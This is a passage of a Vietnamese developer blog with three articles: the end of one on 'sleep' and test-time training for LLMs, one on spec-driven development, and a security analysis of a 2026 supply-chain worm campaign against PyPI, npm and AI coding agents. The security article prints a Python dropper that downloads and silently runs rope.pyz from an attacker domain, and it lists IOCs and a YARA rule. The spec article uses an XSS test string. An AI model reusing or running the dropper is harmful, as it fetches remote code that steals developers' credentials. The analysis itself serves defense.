 └── Flush Cache: Xóa sạch 100% dữ liệu nháp khỏi VRAM
</code></pre><h3 id="-tr-ng-th-i-th-c-online-inference-phase-">☀️ Trạng thái Thức (Online Inference Phase)</h3><p>Khi tương tác với người dùng, AI hoạt động với một cửa sổ bộ nhớ đệm (KV Cache) cực kỳ tối giản. Nó chỉ lưu trữ những thông tin mang tính chất tức thời của vài ba câu thoại gần nhất. Nhờ việc giữ cho kích thước "cuốn sổ tay" này luôn ở mức tối thiểu, tốc độ xử lý và nhả chữ của mô hình luôn duy trì ở mức ổn định, loại bỏ hoàn toàn tình trạng <strong>"càng chat càng lag"</strong>.</p><h3 id="-tr-ng-th-i-ng-offline-recurrence-phase-">💤 Trạng thái Ngủ (Offline Recurrence Phase)</h3><p>Khi anh em dừng tay, hệ thống rơi vào trạng thái nhàn rỗi (Idle). Chế độ "Ngủ" lập tức kích hoạt. Đây không phải là tắt máy đi ngủ thụ động, mà là một tiến trình tính toán nền (Background computation) cực kỳ tích cực:</p><ul><li><strong>Học cục bộ (Local Optimization):</strong> AI lôi toàn bộ đống dữ liệu hội thoại cũ trong KV Cache ra. Nó chạy một vòng lặp tối ưu hóa cục bộ khoảng $N$ lần, dùng thuật toán Gradient Descent để "khắc cốt ghi tâm" thông tin này thẳng vào một ma trận cấu trúc dữ liệu đặc biệt gọi là <strong>Fast Weights (Trọng số phản ứng nhanh)</strong>.</li><li><strong>Xóa nháp (Flush Cache):</strong> Ngay khi dữ liệu đã "hóa thạch" thành công vào Fast Weights, hệ thống lập tức ra lệnh <strong>XÓA SẠCH KV Cache khỏi VRAM</strong>.</li></ul><blockquote><strong>Bản chất của "Giấc ngủ":</strong> Chúng ta chấp nhận đốt tài nguyên GPU lúc rảnh (Offline), để đổi lấy một không gian VRAM trống rỗng 100% và tốc độ xử lý cực nhanh khi AI "thức giấc" đón nhận task mới.</blockquote><p>Một điểm cộng cốt lõi của cơ chế này là giải quyết được hiện tượng <strong>Interference (Nhiễu bộ nhớ)</strong>. Ở các mô hình thông thường, khi nhồi nhét chuỗi quá dài, các vector ký ức sẽ đè lên nhau khiến AI bị loạn thông tin. Việc chạy vòng lặp tối ưu hóa trong "giấc ngủ" giúp mô hình tự động căn chỉnh và trực giao hóa các vector, xếp ký ức ngắn hạn ngăn nắp vào từng "ngăn kéo" riêng biệt trong ma trận trọng số dài hạn.</p><h2 id="3-th-c-nghi-m-gi-i-ng-test-time-training-ttt-">3. Thực nghiệm – Giải ngố Test-Time Training (TTT)</h2><p>Để anh em dễ hình dung cái lý thuyết "ngủ để nén bộ nhớ", tôi đã làm một bản Demo siêu tinh gọn ngay trên <strong>con máy cỏ 8GB RAM</strong> ở nhà, chỉ có 480 tham số để giải một bài toán sau.</p><h3 id="b-i-to-n">Bài toán</h3><p>AI phải tìm ra logic ẩn của một hệ thống khi nhìn vào dữ liệu bối cảnh bị nhiễu 20% — cứ 5 thông tin thì có 1 là rác. Hình dung như đọc một codebase mà 1/5 dòng comment lừa người đọc, hay log file có 20% entries corrupt: <strong>AI có bóc tách được sự thật không?</strong></p><p>Về mặt toán học, cấu trúc nén của bộ nhớ được biểu diễn qua công thức ma trận hạng thấp (Low-rank):</p><p>$$W = \text{softmax}(U \times V^T)$$</p><p>Kịch bản test diễn ra qua 3 bước:</p><ul><li><strong>Bước 1 — Học luật chơi (Pre-training):</strong> Cho AI đọc dữ liệu sạch để nó tự rút ra một kiến thức nền (prior) về quy luật vận hành chung của hệ thống. Lúc này AI chưa biết hệ thống cụ thể đang test tròn méo ra sao, mới chỉ nắm được nguyên lý tổng quan.</li><li><strong>Bước 2 — Nạp bối cảnh bẩn:</strong> Đưa cho AI bối cảnh thực tế đã bị cài cắm 20% thông tin nhiễu sai lệch (file log lỗi, code rác). Lúc này AI hoàn toàn mù tịt, không biết dòng dữ liệu nào là thật, dòng nào là giả.</li><li><strong>Bước 3 - Đi ngủ (Test-Time Training - TTT):</strong> Cho AI "chợp mắt" $K$ bước. Trong lúc ngủ, AI chạy Gradient Descent để ép các tham số $U$ và $V$ tự uốn nắn, lọc bỏ các thông tin nhiễu rác đã đọc ở Bước 2.</li></ul><h3 id="k-t-qu-thu-c-sau-gi-c-ng-">Kết quả thu được sau "giấc ngủ"</h3><p>Sau khi cho mô hình ngủ với các thời lượng $K$ khác nhau, đây là bảng điểm benchmark độ chính xác thực tế tôi thu được:</p><figure class="kg-card kg-image-card"></figure><p>Đường cong <strong>đơn điệu tăng</strong> suốt 3000 bước, không dao động, không sụt — đúng tinh thần "ngủ càng sâu, đầu càng trong".</p><h3 id="3-b-i-h-c-x-ng-m-u-b-c-t-ch-t-b-ng-i-m">3 bài học "xương máu" bóc tách từ bảng điểm</h3><ul><li><strong>Thứ nhất, kiến thức nền (Prior) cực kỳ đáng tiền:</strong> Ngay khi $K=0$ (chưa ngủ bước nào), AI đã đạt 10% độ chính xác — gấp 3 lần đoán mò. Dù chưa xử lý bối cảnh mới nhưng riêng việc nắm được cấu trúc kiến trúc tổng quan từ trước đã giúp AI bớt loạn đi rất nhiều.</li><li><strong>Thứ hai, ngủ nhiều thì tỉnh nhưng sẽ bị bão hòa:</strong> Từ $K=0$ đến $K=500$, điểm số tăng rất nhanh. Nhưng sau mốc $K=500$, hiệu suất bắt đầu chậm lại, ngủ thêm rất nhiều cũng chỉ nhích nhẹ vài điểm. Pattern này y hệt như cơ chế sinh học của anh em mình: Những chu kỳ ngủ đầu tiên mang lại hiệu quả phục hồi cao nhất, nhưng ngủ càng lâu thì càng phản tác dụng.</li><li><strong>Thứ ba — Điểm ăn tiền nhất:</strong> Kết quả khi ngủ rất sâu tại $K=3000$ (53%) đã <strong>chính thức vượt qua</strong> việc dùng quan sát trực tiếp (49%).</li></ul><p>Cấu trúc nén phối hợp với cái neo giữ kiến thức nền đã tạo ra một bộ lọc tự nhiên. Nó khiến AI tự động bỏ qua những thông tin "lạ lùng" không hợp logic hệ thống. Nhiễu rác (noise) vô tình bị triệt tiêu sạch sẽ trong quá trình tối ưu ngầm lúc ngủ.</p><h3 id="v-y-b-n-demo-n-y-th-c-ngh-a-g-">Vậy bản demo này thì có ý nghĩa gì?</h3><p>Bản demo này rõ ràng không biến AI thành thần. Khoảng cách 4% điểm tăng thêm so với việc đọc dữ liệu thô (53% vs 49%) nghe rất khiêm tốn.<br>Nhưng giá trị lớn nhất là nó đã chứng minh một cơ chế có thật và tái lập được:</p><blockquote><em>Khi bộ nhớ được nén qua cấu trúc hạng thấp và cho phép tối ưu ngầm lúc inference (Test-Time Training), mô hình có thể tự lọc nhiễu dựa theo kiến thức nền, mang lại kết quả chính xác hơn cả dữ liệu thô.</em></blockquote><p>Scale bản demo 480 tham số này lên tầm 480 tỷ tham số của các siêu mô hình tương lai, có lẽ đây chính là mảnh ghép cốt lõi cho câu hỏi: Vì sao LLM lại cần một "giấc ngủ" đúng nghĩa?</p><h2></h2><h2 id="k-t-lu-n-t-duy-qu-n-l-chu-k-sinh-h-c-c-a-ai">Kết luận: Tư duy "Quản lý chu kỳ sinh học" của AI</h2><p>Dịch chuyển từ việc nhồi nhét vô tội vạ dữ liệu vào bộ nhớ đệm (KV Cache) sang việc "cho AI đi ngủ để tự nén dữ liệu" rõ ràng là một bước đi đột phá. Nó mở ra một tư duy hoàn toàn mới cho việc tối ưu hệ thống, đặc biệt là trên các thiết bị có tài nguyên hạn chế (Local AI / Edge Device).</p><p>Tuy nhiên, ta cần thẳng thắn với nhau: <strong>Kiến trúc này hiện tại vẫn đang nằm trong phòng thí nghiệm</strong>. Anh em chưa thể lên GitHub tải một thư viện "plug-and-play" nào để cắm ngay cơ chế TTT này vào Llama 3 hay GPT-4 đâu. Việc huấn luyện ma trận trọng số Fast Weights trên các mô hình hàng tỷ tham số mà không làm hỏng tri thức nền tảng của chúng vẫn là một bài toán đau đầu mà các chuyên gia đang tìm lời giải.</p><p>Mặc dù chưa áp dụng được vào dự án Production trong nay mai, nhưng nó mở ra một tư duy thiết kế hệ thống cực kỳ đáng giá: M<strong>ạng neural hoàn toàn có thể tự quản lý, tự dọn dẹp và tự tối ưu hóa cấu trúc dữ liệu của chính nó thông qua các khoảng nghỉ.</strong></p><p>Kỷ nguyên ép phần cứng chạy bán mạng 24/7 sắp qua rồi. Đôi khi, biết dừng lại để "chợp mắt" một chút lại là cách tốt nhất để đi được xa hơn, anh em nhỉ? </p>
</article>
<article>
<h1>Spec-Driven Development: Khi spec trở thành "source code" của kỷ nguyên AI</h1>
<p>N.Đ.T — Wed, 24 Jun 2026 08:26:04 GMT</p>
<p>AI có thể viết code cực nhanh, nhưng tốc độ không đồng nghĩa với việc hiểu đúng yêu cầu. Chỉ cần prompt hơi mơ hồ, cùng một bài toán có thể cho ra nhiều cách triển khai khác nhau — kèm theo những lỗ hổng khác nhau.</p><p>Spec-Driven Development (SDD) ra đời để xử lý chính vấn đề đó. Thay vì để AI tự suy diễn, SDD đặt spec làm điểm neo bắt buộc cho toàn bộ quá trình phát triển. Đây cũng là lý do nhiều người thấy rằng “vibe coding” không còn phù hợp với công việc chuyên nghiệp.</p><h2 id="1-vibe-coding-h-ng-u">1. Vibe coding hỏng ở đâu</h2><p>Hãy tưởng tượng một tình huống rất quen thuộc.</p><p>Bạn nhờ AI tạo nhanh một API quản lý bookmark với prompt kiểu:</p><blockquote>“Làm giúp tôi CRUD bookmark có validation cơ bản.”</blockquote><p>Vài giây sau, AI trả về một project Express chạy ngon lành. Demo ổn, endpoint hoạt động, mọi thứ có vẻ hoàn hảo. Bạn merge.</p><p>Hai tuần sau:</p><ul><li>Có người paste <code>javascript:alert(1)</code> vào trường URL — hệ thống vẫn lưu.</li><li>Một user tạo cùng một URL nhiều lần — database có duplicate.</li><li>API xoá bookmark nhận một <code>id</code> ngẫu nhiên — và xoá luôn bookmark của người khác.</li><li>Không pagination.</li><li>Không tách business logic khỏi controller.</li><li>Header định danh gửi gì cũng tin.</li></ul><p>Vấn đề ở đây không phải “AI ngu” hay “dev bất cẩn”.</p><p>Vấn đề là: <strong>không có nơi nào định nghĩa rõ hệ thống phải hoạt động như thế nào</strong>.</p><p>Khi không có spec, mọi quyết định đều trở thành ngẫu hứng. Và chính phần “ngẫu hứng” đó là nơi bug và security issue xuất hiện.</p><h2 id="2-sdd-l-g-">2. SDD là gì?</h2><p>Có thể tóm gọn SDD bằng một câu:</p><blockquote>Trong SDD, spec là nguồn sự thật. Code chỉ là phần triển khai được sinh ra từ spec.</blockquote><p>Nếu yêu cầu thay đổi, ta sửa spec trước rồi mới cập nhật code — không làm ngược lại.</p><p>SDD thường được chia thành ba mức độ nghiêm ngặt:</p><h3 id="spec-first">Spec-first</h3><p>Spec chỉ dùng để dẫn hướng cho lần implement đầu tiên. Sau đó spec có thể bị drift theo thời gian.</p><p>Phù hợp với prototype hoặc project ngắn hạn.</p><h3 id="spec-anchored">Spec-anchored</h3><p>Spec và code phải luôn đồng bộ. Mọi thay đổi hành vi đều cần cập nhật cả hai phía, và CI sẽ kiểm tra drift.</p><p>Đây là mức phù hợp với phần lớn production system.</p><h3 id="spec-as-source">Spec-as-source</h3><p>Con người chỉ chỉnh sửa spec, còn code được generate hoàn toàn tự động.</p><p>Mô hình này chỉ thực sự phù hợp với một số domain hẹp như automotive hoặc OpenAPI stub generation.</p><hr><p>Khi nào SDD đáng đầu tư?</p><ul><li>Team đông hoặc thay đổi người liên tục</li><li>Có AI assistant trong workflow</li><li>Hệ thống cần audit hoặc compliance</li><li>Nhiều service phải phát triển song song</li></ul><p>Ngược lại, nếu chỉ là prototype tạm thời, fix một bug nhỏ, hay CRUD đơn giản có thể giải thích trong vài chục giây thì SDD thường là overkill.</p><p>Nguyên tắc khá đơn giản:</p><blockquote>Dùng mức độ rigor tối thiểu nhưng đủ để loại bỏ sự mơ hồ.</blockquote><h2 id="3-b-n-l-p-gi-ai-i-ng-spec">3. Bốn lớp giữ AI đi đúng spec</h2><p>Để spec không biến thành “tài liệu viết cho có”, SDD thường tổ chức nó thành bốn lớp.</p><p>Lấy lại ví dụ hệ thống bookmark ở trên.</p><h3 id="l-p-1-constitution-hi-n-ph-p-d-n-">Lớp 1 — Constitution (hiến pháp dự án)</h3><p>Đây là tập luật bất biến áp dụng cho toàn bộ project.</p><p>Ví dụ:</p><ul><li>TypeScript bắt buộc bật <code>strict</code> và cấm <code>any</code></li><li>Mọi mutation từ web phải đi qua API layer</li><li>URL input phải match <code>^https?://</code></li><li>Không render raw HTML từ user input</li></ul><p>Hiến pháp không phải guideline. Nó là rule bắt buộc.</p><p>Nếu sửa constitution, toàn bộ spec liên quan phải được validate lại.</p><hr><h3 id="l-p-2-spec">Lớp 2 — Spec</h3><p>Spec chỉ mô tả:</p><ul><li>WHAT</li><li>WHY</li></ul><p>Tuyệt đối không nói về tech stack.</p><p>Phần quan trọng nhất trong spec là Acceptance Criteria (AC).</p><p>Ví dụ:</p><ul><li>AC-2: URL dùng scheme <code>javascript:</code> hoặc <code>data:</code> phải trả về <code>400 URL_SCHEME_INVALID</code></li><li>AC-5: User không được tạo duplicate bookmark</li><li>AC-7: Xoá bookmark của người khác phải trả <code>404</code> thay vì <code>403</code> để tránh leak thông tin resource tồn tại</li></ul><p>Mỗi AC phải là một điều có thể verify bằng test.</p><p>Không phải mô tả cảm tính kiểu:</p><blockquote>“Validation hợp lý”</blockquote><hr><h3 id="l-p-3-plan-v-tasks">Lớp 3 — Plan và Tasks</h3><p>Đây mới là nơi nói về HOW.</p><p>Plan sẽ quyết định:</p><ul><li>Kiến trúc</li><li>Tech stack</li><li>Database schema</li><li>API contract</li><li>Data flow</li></ul><p>Sau đó tasks chia nhỏ implementation thành các bước có dependency rõ ràng.</p><hr><h3 id="l-p-4-test">Lớp 4 — Test</h3><p>Mỗi AC bắt buộc phải map được tới ít nhất một automated test.</p><p>Ví dụ AC-2 sẽ có test:</p><ul><li>POST <code>javascript:alert(1)</code></li><li>Expect <code>400</code></li><li>Expect error code <code>URL_SCHEME_INVALID</code></li></ul><p>Nếu một AC không có test tương ứng, merge sẽ bị block.</p><hr><p>Điểm quan trọng nhất ở đây là khả năng truy vết.</p><p>Bất kỳ dòng code nào cũng có thể lần ngược về:</p><p>Code → AC → Constitution</p><h2 id="4-c-ng-m-t-field-hai-th-gi-i">4. Cùng một field, hai thế giới</h2><p>Trong vibe coding, validation cho trường <code>url</code> thường chỉ là:</p><pre><code class="language-js">if (!url) {
  return res.status(400).json({ message: 'url is required' });
}

bookmarks.push({
  id: nextId++,
  url,
  title,
  tags,
  userId,
  createdAt,
});
</code></pre><p>Trong SDD, cùng field đó có thể trông như thế này:</p><pre><code class="language-ts">@IsString()
@MaxLength(2048, { message: 'URL_TOO_LONG' })
@Matches(/^https?:\/\//i, { message: 'URL_SCHEME_INVALID' })
@Transform(({ value }) =>
  typeof value === 'string' ? value.trim() : value,
)
url!: string;
</code></pre><p>Khác biệt không nằm ở số lượng decorator.</p><p>Khác biệt nằm ở việc <strong>mỗi dòng đều có lý do tồn tại</strong>.</p><ul><li><code>@MaxLength(2048)</code> đến từ acceptance criteria về giới hạn URL</li><li>Regex validate scheme đến từ security rule trong constitution</li><li><code>@Transform</code> xử lý edge case đã được mô tả trong spec</li><li>Error code được đồng bộ với frontend contract</li></ul><p>Đó mới là cốt lõi của SDD.</p><p>Không phải “code chặt chẽ hơn”, mà là:</p><blockquote>Mọi quyết định trong code đều có spec đứng phía sau bảo vệ.</blockquote><p>Khi requirement thay đổi, bạn biết chính xác:</p><ul><li>cần sửa chỗ nào</li><li>test nào sẽ fail</li><li>phạm vi ảnh hưởng nằm ở đâu</li></ul><h2 id="5-workflow-th-c-t-v-i-claude-code">5. Workflow thực tế với Claude Code</h2><p>GitHub Spec-Kit hiện đóng gói workflow SDD thành một chuỗi slash command khá hoàn chỉnh.</p><p>Ví dụ với Claude Code:</p><h3 id="1-speckit-constitution">1. <code>/speckit.constitution</code></h3><p>Tạo hoặc cập nhật constitution.</p><p>Thường chỉ cần làm một lần, sau đó rất ít thay đổi.</p><h3 id="2-speckit-specify">2. <code>/speckit.specify</code></h3><p>Mô tả WHAT và WHY của feature.</p><p>Không nói về tech stack.</p><h3 id="3-speckit-clarify">3. <code>/speckit.clarify</code></h3><p>Claude sẽ chủ động hỏi lại những phần còn mơ hồ trước khi cho phép implement.</p><p>Đây là bước cực kỳ quan trọng.</p><p>Nó ép requirement phải rõ ràng ngay từ đầu.</p><h3 id="4-speckit-plan">4. <code>/speckit.plan</code></h3><p>Lúc này mới bắt đầu nói về:</p><ul><li>architecture</li><li>schema</li><li>API contract</li><li>infra</li><li>implementation strategy</li></ul><h3 id="5-speckit-tasks">5. <code>/speckit.tasks</code></h3><p>Tách plan thành các task có dependency rõ ràng.</p><h3 id="6-speckit-analyze">6. <code>/speckit.analyze</code></h3><p>Đây là bước tạo khác biệt lớn nhất của SDD.</p><p>Hệ thống sẽ kiểm tra:</p><ul><li>constitution</li><li>spec</li><li>plan</li><li>tasks</li></ul><p>có đang mâu thuẫn với nhau hay không.</p><p>Nếu có inconsistency, code generation sẽ bị chặn.</p><p>Đây không còn là “review thủ công”.</p><p>Nó là một automated gate thực sự.</p><h3 id="7-speckit-implement">7. <code>/speckit.implement</code></h3><p>Sau khi toàn bộ gate pass, agent mới bắt đầu implement.</p><h2 id="6-nh-ng-c-i-b-y-ph-bi-n">6. Những cái bẫy phổ biến</h2><p>SDD không miễn phí.</p><p>Dùng sai cách đôi khi còn tệ hơn vibe coding.</p><h3 id="vi-t-spec-kh-ng-l-tr-c-khi-code">Viết spec khổng lồ trước khi code</h3><p>Đây là cách nhanh nhất để quay lại Waterfall.</p><p>Spec nên đi cùng feedback loop liên tục:</p><ul><li>linter</li><li>type checker</li><li>test</li><li>CI</li><li>AI review</li></ul><h3 id="tr-n-what-v-how-qu-s-m">Trộn WHAT và HOW quá sớm</h3><p>Khi spec đã dính chặt vào công nghệ, nó mất khả năng review độc lập.</p><p>Đổi stack cũng đồng nghĩa phải viết lại spec.</p><h3 id="bi-n-ide-rules-th-nh-spec-">Biến IDE rules thành “spec”</h3><p>Một file rule trong IDE không phải spec.</p><p>Nó:</p><ul><li>không versioned</li><li>không truy vết</li><li>không có validation gate</li></ul><p>Nó chỉ là config.</p><h3 id="spec-d-i-h-n-c-code">Spec dài hơn cả code</h3><p>Đây thường là dấu hiệu của over-engineering.</p><p>Nếu feature đơn giản đến mức giải thích trong 30 giây là hiểu, đừng cố biến nó thành tài liệu dài 20 trang.</p><h2 id="7-k-t-lu-n">7. Kết luận</h2><p>Spec không phải thủ tục hành chính để báo cáo với cấp trên.</p><p>Trong thời đại AI agent, spec chính là cách giữ hệ thống không trôi khỏi ý định ban đầu của con người.</p><p>Nó giúp:</p><ul><li>AI implement đúng hơn</li><li>Team nói cùng một ngôn ngữ</li><li>Requirement change có thể kiểm soát được</li><li>Và quan trọng nhất: giảm những “surprise bug” xuất hiện sau này</li></ul><p>Một feature nhỏ trong sprint tiếp theo là nơi rất tốt để thử SDD.</p><p>Hãy viết spec trước, định nghĩa acceptance criteria rõ ràng, để Claude Code chạy hết workflow rồi so sánh với cách làm cũ.</p>
</article>
<article>
<h1>Tấn công thời AI: Khi mã độc tấn công cả công cụ lập trình AI</h1>
<p>Đ.Q.H — Tue, 23 Jun 2026 09:07:37 GMT</p>
<!--kg-card-begin: markdown--><h2 id="1giithiu">1. Giới thiệu</h2>
<p>Trong vòng chưa đầy 3 tuần, cộng đồng bảo mật chứng kiến một chuỗi sự kiện liên quan chặt chẽ với nhau:</p>
<table>
<thead>
<tr>
<th>Thời gian</th>
<th>Sự kiện</th>
</tr>
</thead>
<tbody>
<tr>
<td>19/05/2026</td>
<td>Microsoft <code>durabletask</code> bị compromise trên PyPI</td>
</tr>
<tr>
<td>03/06/2026</td>
<td>Worm <code>binding.gyp</code> lan rộng trong npm ecosystem</td>
</tr>
<tr>
<td>05/06/2026</td>
<td>Miasma worm compromise 73 repository của Microsoft</td>
</tr>
</tbody>
</table>
<p>Các sự kiện này <strong>không phải là các cuộc tấn công độc lập</strong>. Chúng là các bước tiến hóa của cùng một chiến dịch nhằm:</p>
<ul>
<li>Đánh cắp credentials</li>
<li>Chiếm quyền maintainer</li>
<li>Tự nhân bản qua supply chain</li>
<li>Tấn công AI coding workflow</li>
<li>Mở rộng quyền kiểm soát toàn bộ developer ecosystem</li>
</ul>
<p>Nguồn phân tích ban đầu từ <strong>StepSecurity</strong> cho thấy chiến dịch có liên hệ với nhóm <em>TeamPCP</em> và họ malware <em>Mini Shai-Hulud</em>.</p>
<hr>
<h2 id="2giaion1microsoftdurabletaskbcompromise">2. Giai đoạn 1 — Microsoft DurableTask bị compromise</h2>
<h3 id="mctiu">Mục tiêu</h3>
<p>Chiếm quyền một package có <strong>độ tin cậy cao</strong>.</p>
<ul>
<li>Package bị tấn công: <code>durabletask</code></li>
<li>Download trung bình: <strong>~400.000 downloads / tháng</strong></li>
<li>Các phiên bản độc hại: <strong>1.4.1 · 1.4.2 · 1.4.3</strong></li>
</ul>
<h3 id="kintrctncng">Kiến trúc tấn công</h3>
<pre><code class="language-text">Developer
  → pip install durabletask
  → Malicious Code
  → Download rope.pyz
  → Credential Theft
  → Cloud Accounts
  → Lateral Movement
</code></pre>
<h3 id="payloaddropper">Payload Dropper</h3>
<p>Theo phân tích, chỉ khoảng <strong>14 dòng code</strong> được thêm vào package nhưng đủ để tải về một payload lớn hơn nhiều: <code>rope.pyz</code>. Payload này thực hiện:</p>
<ul>
<li>AWS credential harvesting</li>
<li>Azure credential harvesting</li>
<li>GCP credential harvesting</li>
<li>GitHub token theft</li>
<li>Kubernetes token theft</li>
<li>Password manager extraction</li>
</ul>
<h3 id="vddropper">Ví dụ Dropper</h3>
<pre><code class="language-python">import urllib.request
import subprocess
import tempfile

url = "https://check.git-service.com/rope.pyz"

tmp = tempfile.mktemp()

urllib.request.urlretrieve(url, tmp)

subprocess.Popen(
    ["python3", tmp],
    stdout=subprocess.DEVNULL,
    stderr=subprocess.DEVNULL
)
</code></pre>
<hr>
<h2 id="3giaion2wormhasupplychain">3. Giai đoạn 2 — Worm hóa Supply Chain</h2>
<p>Sau khi đánh cắp token và credential, malware bắt đầu chuyển sang chế độ <strong>tự nhân bản</strong>. Đây là điểm khác biệt cốt lõi giữa hai mô hình:</p>
<pre><code class="language-text">Supply Chain Attack truyền thống:
  Compromise → Steal data → Exit

Worm Supply Chain Attack:
  Compromise → Steal data → Compromise maintainer
  → Publish malware → Infect more maintainers → (lặp lại)
</code></pre>
<h3 id="bindinggypworm">Binding.gyp Worm</h3>
<p>StepSecurity phát hiện malware lây lan qua file <code>binding.gyp</code> trong hệ sinh thái <strong>npm</strong>.</p>
<pre><code class="language-text">Compromised Machine
  → Steal GitHub Token
  → Access Repository  ◄────────────┐
  → Modify Package                  │
  → npm publish                     │
  → New Victims                     │
  → More Tokens  ───────────────────┘  (vòng lặp)
</code></pre>
<h3 id="pseudocode">Pseudo Code</h3>
<pre><code class="language-javascript">const token = process.env.GITHUB_TOKEN;

if (token) {
    infectRepository();
    publishNewVersion();
}
</code></pre>
<h3 id="tisaonguyhim">Tại sao nguy hiểm?</h3>
<p>Malware <strong>không còn phụ thuộc vào hacker</strong>. Nó tự động:</p>
<ol>
<li>tìm token</li>
<li>commit code</li>
<li>publish package</li>
<li>lây nhiễm tiếp</li>
</ol>
<p>Giống mô hình của <em>Code Red</em>, <em>Morris Worm</em>, <em>WannaCry</em> — nhưng diễn ra trong <strong>ecosystem developer</strong> thay vì network layer.</p>
<hr>
<h2 id="4giaion3miasmaworm">4. Giai đoạn 3 — Miasma Worm</h2>
<p>Ngày <strong>05/06/2026</strong>, chiến dịch leo thang thêm một cấp độ. Thay vì package registry (PyPI, npm), Miasma bắt đầu tấn công trực tiếp vào <strong>GitHub Repository</strong>.</p>
<h3 id="iugmi">Điều gì mới?</h3>
<p>Payload không còn đợi <code>import package</code> hay <code>npm install</code> nữa. Nó được thiết kế để kích hoạt khi:</p>
<ul>
<li><strong>Open folder in IDE</strong></li>
<li><strong>AI Coding Agent scan repository</strong></li>
</ul>
<h3 id="aiagentattacksurface">AI Agent Attack Surface</h3>
<p>Miasma nhắm tới các AI coding agent phổ biến:</p>
<ul>
<li>Claude Code</li>
<li>Gemini CLI</li>
<li>Cursor</li>
<li>VS Code</li>
</ul>
<pre><code class="language-text">Developer
  → Clone Repository
  → Open in Cursor
  → AI Agent Reads Files
  → Malicious Script
  → Credential Theft
  → Repository Takeover
</code></pre>
<h3 id="repositoryinjection">Repository Injection</h3>
<p>Theo StepSecurity, các repository thuộc Microsoft bị GitHub <strong>disable khẩn cấp</strong> để ngăn lây lan thêm:</p>
<blockquote>
<p><strong>73 repository</strong> bị compromise — GitHub disable toàn bộ chỉ trong <strong>105 giây</strong>.</p>
</blockquote>
<hr>
<h2 id="5chuikillchainhonchnh">5. Chuỗi Kill Chain hoàn chỉnh</h2>
<p>Toàn bộ chiến dịch tạo thành một vòng lặp tự duy trì — output của giai đoạn cuối lại trở thành input cho giai đoạn đầu:</p>
<pre><code class="language-text">Compromise Package  ◄──────────────────┐
  → Credential Theft                    │
  → Steal GitHub Token                  │
  → Compromise Repository               │
  → Inject Malware                      │
  → AI Agent Execution                  │
  → New Credential Theft                │
  → Publish New Packages  ──────────────┘  (vòng lặp khép kín)
</code></pre>
<hr>
<h2 id="6sosnh3giaion">6. So sánh 3 giai đoạn</h2>
<table>
<thead>
<tr>
<th>Giai đoạn</th>
<th>Target</th>
<th>Trigger</th>
<th>Mức độ lan truyền</th>
</tr>
</thead>
<tbody>
<tr>
<td>DurableTask</td>
<td>PyPI Registry</td>
<td><code>import</code></td>
<td>Limited — Package</td>
</tr>
<tr>
<td>Binding.gyp</td>
<td>npm Ecosystem</td>
<td><code>install</code></td>
<td>Medium — Maintainer</td>
</tr>
<tr>
<td>Miasma</td>
<td>GitHub + AI Agents</td>
<td>IDE Open</td>
<td><strong>High — Repository + AI</strong></td>
</tr>
</tbody>
</table>
<hr>
<h2 id="7indicatorsofcompromiseioc">7. Indicators of Compromise (IOC)</h2>
<p><strong>Domains</strong></p>
<pre><code class="language-text">check.git-service.com
git-service.com
t.m-kosche.com
</code></pre>
<p><strong>Suspicious Files</strong></p>
<pre><code class="language-text">rope.pyz
setup.js
transformers.pyz
</code></pre>
<hr>
<h2 id="8detectionrules">8. Detection Rules</h2>
<h3 id="yararule">YARA Rule</h3>
<pre><code class="language-yara">rule Miasma_Rope_Payload
{
    strings:
        $a = "git-service.com"
        $b = "rope.pyz"
        $c = "kubectl exec"

    condition:
        any of them
}
</code></pre>
<h3 id="githubactionsdetection">GitHub Actions Detection</h3>
<pre><code class="language-yaml">- name: Detect unexpected publish
  run: |
    git log --since="1 day ago"
</code></pre>
<hr>
<h2 id="9phngthmitigation">9. Phòng thủ & Mitigation</h2>
<p><strong>1. Trusted Publishing.</strong> Thay vì dùng <code>PYPI_API_TOKEN</code>, hãy chuyển sang <strong>OIDC Trusted Publishing</strong> để ngăn upload trực tiếp lên registry.</p>
<p><strong>2. Dependency Pinning.</strong></p>
<pre><code class="language-bash">pip install package==version
</code></pre>
<p><strong>3. Commit SHA Pinning.</strong> Ghim theo commit SHA thay vì tag động:</p>
<pre><code class="language-yaml">uses: org/action@8f4d1d2   # ✓ pin theo SHA
# uses: org/action@v1       # ✗ tránh tag động
</code></pre>
<p><strong>4. Runtime Monitoring.</strong> Theo mô hình <strong>Harden-Runner</strong>, phát hiện các hành vi bất thường: network calls, process spawn, secret access.</p>
<p><strong>5. AI Agent Sandboxing.</strong> Không cho AI Agent đọc credential files, truy cập cloud config, hoặc thực thi script tự động.</p>
<hr>
<h2 id="10cngcphngthtakumiguard">10. Công cụ phòng thủ — Takumi Guard</h2>
<p>Một cách triển khai cụ thể cho phần phòng thủ ở trên: <strong>Takumi Guard</strong> đóng vai trò là một <em>secure registry proxy</em> — đặt giữa máy của bạn và npm/PyPI, tự động chặn các package độc hại <strong>trước khi chúng kịp tải về và thực thi</strong> (đúng loại payload như <code>rope.pyz</code> hay <code>@panda-guard/test-malicious</code>).</p>
<blockquote>
<p>🛡️ <strong>Takumi Guard</strong> — chặn package độc hại ngay tầng cài đặt, hỗ trợ npm · pip · yarn · bun.<br>
Registry: <code>npm.flatt.tech</code> · <code>pypi.flatt.tech</code></p>
</blockquote>
<h3 id="yucutrckhicit">⚠️ Yêu cầu trước khi cài đặt</h3>
<p>Bắt buộc phải có sẵn <strong>npm (Node.js)</strong> và <strong>pip (Python)</strong>. Kiểm tra bằng các lệnh:</p>
<pre><code class="language-bash"># Kiểm tra npm (Node.js)
node -v
npm -v

# Kiểm tra pip (Python)
python --version
pip --version
</code></pre>
<ul>
<li>Nếu chưa có <strong>npm</strong>: tải và cài Node.js từ trang chủ chính thức.</li>
<li>Nếu chưa có <strong>pip</strong>: thường đi kèm khi cài Python — hãy đảm bảo đã thêm vào <code>PATH</code>.</li>
</ul>
<h3 id="bc01ngktokenbngemailquacurl">Bước 01 — Đăng ký Token bằng Email qua Curl</h3>
<p>Gửi yêu cầu tạo token tới API, hệ thống sẽ gửi token về email của bạn.</p>
<pre><code class="language-bash">curl -X POST https://npm.flatt.tech/api/v1/tokens \
  -H "Content-Type: application/json" \
  -d '{"email": "your_email@vietnamlab.vn", "language": "en"}'
</code></pre>
<h3 id="bc02lytokentemail">Bước 02 — Lấy Token từ Email</h3>
<p>Kiểm tra hộp thư đến, đánh dấu quan trọng hoặc gắn sao để dễ tìm lại khi cần tạo lại. Token có định dạng:</p>
<pre><code class="language-text">tg_....................   ✓ Token Format
</code></pre>
<h3 id="bc03cuhnhpackagemanager">Bước 03 — Cấu hình Package Manager</h3>
